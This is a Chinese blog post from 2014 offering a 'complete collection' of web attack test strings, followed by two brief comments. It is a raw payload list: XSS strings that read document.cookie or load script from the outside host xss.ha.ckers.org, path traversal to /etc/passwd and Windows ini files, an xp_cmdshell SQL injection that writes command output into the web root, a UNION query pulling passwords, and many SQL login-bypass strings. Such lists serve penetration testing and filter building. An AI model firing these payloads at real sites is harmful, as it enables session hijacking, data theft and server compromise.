XSS跨站测试代码大全

‘><script>alert(document.cookie)</script>

=’><script>alert(document.cookie)</script>

%3Cscript%3Ealert(‘XSS’)%3C/script%3E

%0a%0a<script>alert(\”Vulnerable\”)</script>.jsp

%22%3cscript%3ealert(%22xss%22)%3c/script%3e

%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini

%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html

%3f.jsp

?sql_debug=1

a%5c.aspx

a.jsp/<script>alert(‘Vulnerable’)</script>

a?<script>alert(‘Vulnerable’)</script>

“><script>alert(‘Vulnerable’)</script>

‘;exec%20master..xp_cmdshell%20′dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt’–&&

%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

%3Cscript%3Ealert(document. domain);%3C/script%3E&

%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=

1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=

http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd

..\..\..\..\..\..\..\..\windows\system.ini

\..\..\..\..\..\..\..\..\windows\system.ini

”;!–”<XSS>=&{()}

“<IMG src=java\0script:alert(\”XSS\”)>”;’ > out

<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

getURL("javascript:alert('XSS')")

a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);

"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"

<IMG src="javascript:alert('XSS')"

<SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a[/code]

posted on 2014-02-14 11:32 顺其自然EVO 阅读(3318) 评论(2) 编辑收藏

# re: XSS跨站测试代码大全[未登录] 2014-11-24 19:04 123

# re: XSS跨站测试代码大全 2014-12-29 10:07 people

for god's sake 回复更多评论

新用户注册刷新评论列表


只有注册用户登录后才能发表评论。




网站导航: 博客园 IT新闻知识库 C++博客博问管理

# re: XSS跨站测试代码大全[未登录] 2014-11-24 19:04 123

# re: XSS跨站测试代码大全 2014-12-29 10:07 people

qileilove

XSS跨站测试代码大全

评论

导航

统计

常用链接

留言簿(55)

随笔分类

随笔档案

文章分类

文章档案

搜索

最新评论

阅读排行榜

评论排行榜